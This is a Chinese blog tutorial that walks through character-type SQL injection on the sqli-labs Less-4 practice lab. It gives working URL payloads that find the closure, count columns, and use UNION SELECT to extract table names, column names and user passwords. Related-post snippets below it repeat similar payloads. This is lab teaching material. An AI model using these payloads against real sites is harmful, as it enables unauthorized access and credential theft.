字符型注入

原创 已于 2025-05-16 11:37:05 修改 · 603 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库

于 2025-04-19 17:37:17 首次发布

文章目录

本篇重点

前情提要

注入流程,判断注入类型请观看此篇

注释

注释
作用注释就是对代码的解释和说明
特性注释后面的命令不会被执行,在注入中可以让后面的语句不被执行,达到想要的效果
种类--+ #

字符型注入条件

需要显示位

字符型注入思路

探测注入点,确认是否存在字符型注入漏洞,利用联合查询注入,通过UNION查询获取所需数据

示例

本示例为sqli-labs 4

添加注入点

在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=1

判断注入类型

利用and 1=2通过页面回显判断注入类型,由下可得是字符型注入
在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=1 and 1=2

寻找闭合方式

利用页面报错信息可得是")闭合

http://127.0.0.1/sql/Less-4/
?id=1") and 1=1

添加注释,将后面的语句注释掉
在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=1") and 1=1 --+

下面步骤,就跟整型注入一样了,详情重点请见此篇

判断列数

通过页面报错,判断列数
在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=1") group by 4 --+

即,得出有3
在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=1") group by 3 --+

查询显示位

在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=-1") union select 1,2,3 --+

查询当前数据库

在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=-1") union select 1,database(),3 --+

查询表名

在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=-1") union select 1,database(),(select group_concat(table_name) 
from information_schema.tables where table_schema=database()) --+

查询列名

在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=-1") union select 1,database(),(select group_concat(column_name) 
from information_schema.columns where table_schema=database() and table_name='users') --+

查询字段

在这里插入图片描述

http://127.0.0.1/sql/Less-4/
?id=-1") union select 1,database(),(select group_concat(concat_ws(0x23,id,username,password)) from users) --+

如有问题欢迎在评论区讨论

【漏洞挖掘】——99、字符型注入深入刨析(上)
Fly_鹏程万里
06-20 169
数据库安全中字符型注入(String-based Injection)是一种常见的安全漏洞攻击类型,针对的是处理字符型数据时的输入验证不足或不正确处理,攻击者利用这个漏洞通过恶意注入特殊字符或字符串来绕过应用程序的输入验证,执行未经授权的数据库查询或获取敏感数据,由于可控参数为字符型,所以我们也常常将此类型的注入漏洞被称之为"字符型"注入
pikachu闯关(二)---字符型注入
weixin_75034911的博客
07-05 1060
首先我们要知道字符型和数字型的区别:当我们输入的是整数并且不需要使用引号闭合时,为数字型,而字符型是当我们输入的内容为字符串类型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。所以字符型注入是需要使用单引号进行闭合的,然后在后面接上我们的payload。
SQL注入字符型注入(GET)
Ethan024的博客
03-22 656
SQL注入—数值型注入(GET)(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—数值型注入(GET) 实验步骤: 当输入一个数据库里存在的用户名时候,会出现相关邮箱和id: 当输入一个不存在的字符串时,没有任何信息: 查看其URL,发现请求实在URL中提交的,是一个GET请求: http://localhost/pikaqiu.cn/vul/sqli/sqli_str.php?name=1111&submit=%E6%9F%A5%E8%AF%A2
Sql注入实验(一)——字符型注入(GET)
DaydreamF的博客
04-13 1680
Sqli-libs Less1——字符型注入 URL:http://192.168.224.128/sqli/Less-1/ 一、手工注入 1…打开页面,如下所示: 2.根据提示,在url后输入参数id的值,页面显示: 说明,根据传入id参数值的不同,后台服务器查询的数据不同,展示在了前端界面。(参数可控) 3.尝试在参数值的后面输入特殊字符,看页面是否报出数据库语法错误: 报错语句: You have an error in your SQL syntax; check the manual t
理论篇8:SQL注入(字符型注入和数字型注入)
aiojay的博客
05-02 4332
SQL注入(字符型注入和数字型注入),Mysql中 int(3) 类型的含义,判断MYSQL注入闭合方式:
SQL 字符型注入
MZa1213123的博客
03-02 4672
CTFHub SQL 字符型注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符型的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
sql注入基础 (字符型注入 数字型注入等)
最新发布
07-06
sql注入基础 (字符型注入 数字型注入等)
【数字型和字符型注入
My笔记的博客
06-28 545
上面的查询过程有一个username表,数据库会先把所有数据都取出来,第一步里面取出来了两个数据分别是amdin和guest接着,把我们要查询的字符和数据库里面的字符进行对比,先用admin 和 传入的 admin进行对比,结果是为真,接着是拿guest 和 admin 进行对比,结果为假,那么返回的只有 admin 这一行的数据。服务器返回了数据库内所有的数据,因为我们上的语句用了or那么意味着,不管我输入的账号对不对,因为1=1所以服务器匹配到的数据都为真,那么就输出了所有的数据。
【SQL注入字符型注入
noob_3000的博客
08-07 623
SQL字符型注入
CTFHub | 字符型注入
尼泊罗河伯的博客
10-27 1666
此题目和上一题相似,一个是整数型注入,一个是字符型注入字符型注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
实验8:字符型注入
qq_44720671的博客
03-24 2531
字符型注入 打开Pikachu中的字符型注入 这里是给用户一个对话框,让用户输入用户名·。我们可以先看一下后端源代码 可以看到,在输入的用户名外面,有两个单引号。除此之外,并没有做什么防护措施,因此,我们可以在输入框中输入一段代码,让数据库直接跳过判断,显示所有信息。 由于有单引号,因此无论我们输入什么,都会被当做用户名去进行判断,所以我们需要将单引号“屏蔽掉”,前引号我们可以在任意输入的用户...
③基于字符型的SQL注入
热门推荐
熊俊坤的博客
10-24 1万+
基于字符型的SQL注入
sql-labs数字型、字符型注入
m0_63510587的博客
02-16 4017
访问SQLi-Labs网站 一、数字型注入 1、访问less-2 访问后根据提示先给定一个GET参数 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 此时页面显示id=1的用户名和密码 2、寻找注入点、判断注入类型 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ >> 运行后报错 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=1 >>
MySQL联合注入字符型注入
m0_50211409的博客
03-27 1868
关于字符型注入 首先我们都知道,在数据库中字符串都是被单引号与双引号包裹起来的。 我们分析一下字符型注入的SQL语句 select*from admin where id='1' 这是字符型注入后的语句 我们在传参的时候 ...
pikachu字符型注入
m0_58887624的博客
11-09 2116
1.字符型注入吧。直接就 1' 报错了 2.存在字符型注入 3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据 4. 确定一下字段的显示位置嘛。 1' union select 1,2# 5.查一下数据库名 1' union select database(),version()# /**数据库名和版本**/ 只有数据库5.0以上的版本,才会存在i...
字符型注入,报错注入
Dug123456_的博客
04-03 2928
输入不同种的语句 显示的不同 存在sql漏洞输入1发现id=‘1’,所以为字符型注入
2021-11-09 SQL注入---字符型注入(GET)
夕阳的街道的博客
11-09 1675
本文章仅供学习和参考! 欢迎交流~ 一、实验题目:字符型注入(GET) 二、环境准备: 漏洞练习平台:https://buuoj.cn/ 三、实验过程: 1. 启动靶机:进入“buuctf”-->左边列表选择“Basic”-->右边选择“PikaChu” 2. 初始化安装: 3. 在左边列表选择“SQL-Inject”-->“字符型注入(get)”: 4. 尝试输入用户名“kobe”,可以看到数据库返回了一个...
SQL注入系列之PHP+Mysql手动注入(二)----字符型
fendo
02-25 7209
一、什么是字符型注入以及原理 1)字符型注入简介 字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类型。 字符型注入就是把输入的参数当做字符串来对数据库进行查询,字符型注入在sql语句中都采用单引号括起来。 2)基本原理: 看看这条SQL语
数字型注入字符型注入
12-27
### SQL注入类型对比:数字型注入 vs 字符型注入 #### 数字型注入的特点 对于数字型注入,通常发生在`id`字段或其他预期接收数值的地方。由于数据库中的`id`类型是`int`型,只会取纯数字的整数部分[^2]。这意味着...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值